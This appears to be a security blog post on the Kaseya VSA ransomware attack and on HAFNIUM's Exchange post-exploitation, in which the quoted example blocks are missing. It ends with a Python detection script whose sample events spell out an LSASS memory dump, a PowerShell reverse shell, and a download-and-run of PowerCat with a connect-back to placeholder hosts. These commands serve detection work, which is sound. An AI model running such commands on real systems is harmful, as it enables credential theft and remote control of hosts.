Breach

Hello All. If you haven’t yet heard the news about this, you probably will eventually. This vulnerability made the news over the long weekend. I thought I would provide a bit of an update. This is another supply chain attack, similar in its basic methodology to last year’s SolarWinds attack: malware was delivered to victims through a trusted update mechanism rather than by attacking each victim directly.

The Virtual System/Server Administrator (VSA) is software used by Kaseya customers to monitor and manage their infrastructure. It is supplied either as a hosted cloud (SaaS) service run by Kaseya, or as on-premises VSA servers deployed by end customers or by MSPs. VSA pushes agent updates to the endpoints it manages and, on Friday July 2, that update mechanism on compromised on-premises VSA servers was used to push REvil ransomware to managed endpoints. Fewer than 40 Kaseya VSA customers were hit directly, but around 30 of them were MSPs, whose VSA instances in turn pushed the ransomware to their own customers' systems. Potentially thousands of MSP client businesses were infected.

Here is VSA:

Kaseya has released a “Compromise Detection Tool” that checks whether a VSA installation has been compromised. All on-premises VSA servers should remain offline until Kaseya gives further instructions about when it is safe to restore operations. A patch will have to be installed before VSA is restarted, and Kaseya will also publish a set of recommendations for hardening the deployment.

Here is a listing of various sites that have posted IOCs and/or TTPs:

  • Trend Micro – https://success.trendmicro.com/solution/000286890
  • McAfee – https://kc.mcafee.com/corporate/index?page=content&id=KB94660&locale=en_US
  • Cisco Talos – https://blog.talosintelligence.com/2021/07/revil-ransomware-actors-attack-kaseya.html
  • Huntress – https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident
  • Splunk – https://www.splunk.com/en_us/blog/security/kaseya-sera-what-revil-shall-encrypt-shall-encrypt.html

Hello All. I wanted to pass on these pretty good technical details on the vulnerabilities affecting on-premises Microsoft Exchange:

After exploiting these vulnerabilities to gain initial access, HAFNIUM operators deployed web shells on the compromised server. Web shells potentially allow attackers to steal data and perform additional malicious actions that lead to further compromise. One example of a web shell deployed by HAFNIUM, written in ASP, is below:

Following web shell deployment, HAFNIUM operators performed the following post-exploitation activity:

  • Using Procdump to dump the LSASS process memory:

  • Using 7-Zip to compress stolen data into ZIP files for exfiltration:

  • Adding and using Exchange PowerShell snap-ins to export mailbox data:

  • Using the Nishang Invoke-PowerShellTcpOneLine reverse shell:

  • Downloading PowerCat from GitHub, then using it to open a connection to a remote server:

HAFNIUM operators were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users.

Our blog, Defending Exchange servers under attack, offers advice for improving defenses against Exchange server compromise. Customers can also find additional guidance about web shell attacks in our blog Web shell attacks continue to rise.
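The post-exploitation chain quoted above (Procdump against LSASS, 7-Zip staging, Exchange snap-in mailbox exports, the Nishang TCP one-liner, PowerCat) maps cleanly onto command-line detection. The following is an added example written for this page; it is not code from the original post or from Microsoft's write-up. It runs a handful of rules over constructed process-creation records (fields in the shape of Windows Security event 4688 or Sysmon Event ID 1) and reports which steps of the chain are present. The sample records, the renamed Procdump (`pd.exe`), the `example.invalid` host and the 192.0.2.10 address are all assumptions made for the example; the ATT&CK technique IDs are the standard ones for each behaviour.

```python
"""Detect the HAFNIUM-style post-exploitation chain in process-creation records.

Added example for this page, not code from the original post or from Microsoft.
Events and patterns are constructed for illustration and would need tuning
(allow-lists for backup jobs, admin workstations, etc.) before production use.
"""
from __future__ import annotations

import re

# (rule name, ATT&CK technique, regex applied to the lower-cased command line)
RULES = [
    # Procdump is frequently renamed, so match its arguments (-ma = full dump) and the target.
    ("lsass_memory_dump", "T1003.001",
     re.compile(r"(procdump|-ma\s).*\blsass\b")),
    # 7z/7za run with the 'a' (add to archive) command; extraction ('x') is not flagged.
    ("archive_staging_7zip", "T1560.001",
     re.compile(r'\b7za?\b(\.exe)?"?\s+a\s')),
    # Exchange snap-in loaded, or a mailbox export requested, from a command line.
    ("exchange_mailbox_export", "T1114.002",
     re.compile(r"add-pssnapin\s+microsoft\.exchange|new-mailboxexportrequest")),
    # Core of Nishang's Invoke-PowerShellTcpOneLine: a raw TCPClient created from PowerShell.
    ("powershell_tcp_reverse_shell", "T1059.001",
     re.compile(r"system\.net\.sockets\.tcpclient")),
    # PowerCat fetched or invoked by name; a renamed copy needs a different signal.
    ("powercat_tool_transfer", "T1105",
     re.compile(r"powercat")),
]

# Constructed sample records (NOT real HAFNIUM artefacts): pid, user, command line.
# 192.0.2.10 is a documentation address and example.invalid a placeholder host.
SAMPLE_EVENTS = [
    {"pid": 812, "user": "NT AUTHORITY\\SYSTEM",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
    {"pid": 2204, "user": "CORP\\patchsvc",  # benign extraction, must not fire
     "cmdline": r'"C:\Program Files\7-Zip\7z.exe" x C:\Updates\kb.7z -oC:\Updates'},
    {"pid": 5532, "user": "NT AUTHORITY\\SYSTEM",  # renamed Procdump dumping LSASS
     "cmdline": r"C:\ProgramData\pd.exe -accepteula -ma lsass.exe C:\ProgramData\lsass.dmp"},
    {"pid": 5610, "user": "NT AUTHORITY\\SYSTEM",  # staging dumps and PSTs into a ZIP
     "cmdline": r'"C:\ProgramData\7z.exe" a -tzip C:\ProgramData\it.zip C:\ProgramData\*.dmp C:\ProgramData\*.pst'},
    {"pid": 5688, "user": "NT AUTHORITY\\SYSTEM",  # snap-in load plus mailbox export
     "cmdline": r'powershell.exe -nop -w hidden -c "Add-PSSnapin Microsoft.Exchange.PowerShell.Snapin; New-MailboxExportRequest -Mailbox ceo@corp.example -FilePath \\localhost\c$\ProgramData\mbx.pst"'},
    {"pid": 5702, "user": "NT AUTHORITY\\SYSTEM",  # TCP reverse shell one-liner
     "cmdline": r'''powershell.exe -nop -w hidden -c "$c=New-Object System.Net.Sockets.TCPClient('192.0.2.10',443);$s=$c.GetStream()"'''},
    {"pid": 5740, "user": "NT AUTHORITY\\SYSTEM",  # PowerCat download and connect-back
     "cmdline": r'''powershell.exe -nop -c "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/powercat.ps1'); powercat -c 192.0.2.10 -p 443 -e cmd"'''},
    {"pid": 6120, "user": "CORP\\helpdesk",  # ordinary scripted admin, must not fire
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
]


def match_rules(cmdline: str) -> list[tuple[str, str]]:
    """Return (rule, technique) for every rule whose pattern hits the command line."""
    lowered = cmdline.lower()
    return [(name, tid) for name, tid, rx in RULES if rx.search(lowered)]


def scan(events: list[dict]) -> list[dict]:
    """One finding per (event, rule) hit, in event order."""
    findings = []
    for ev in events:
        for name, tid in match_rules(ev["cmdline"]):
            findings.append({"pid": ev["pid"], "user": ev["user"],
                             "rule": name, "technique": tid})
    return findings


def chain_coverage(findings: list[dict]) -> list[str]:
    """Distinct rules that fired, in order of first appearance: a quick read on
    how much of the post-exploitation chain is present on a host."""
    seen: list[str] = []
    for f in findings:
        if f["rule"] not in seen:
            seen.append(f["rule"])
    return seen


if __name__ == "__main__":
    hits = scan(SAMPLE_EVENTS)
    for f in hits:
        print(f"pid={f['pid']:<5} {f['technique']:<9} {f['rule']:<30} {f['user']}")
    print("chain steps observed:", ", ".join(chain_coverage(hits)))
```

Matching on Procdump's `-ma` argument rather than its file name, and on the `System.Net.Sockets.TCPClient` constructor rather than the script name, is deliberate: Procdump, 7-Zip and PowerCat are commodity tools that attackers routinely rename or inline. PowerCat is matched by name only here, so a renamed copy would need a network or module-load signal instead. A mailbox export initiated from a hidden PowerShell window under SYSTEM is the kind of context that should raise the severity of the Exchange rule above what an administrator's interactive `New-MailboxExportRequest` would get.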
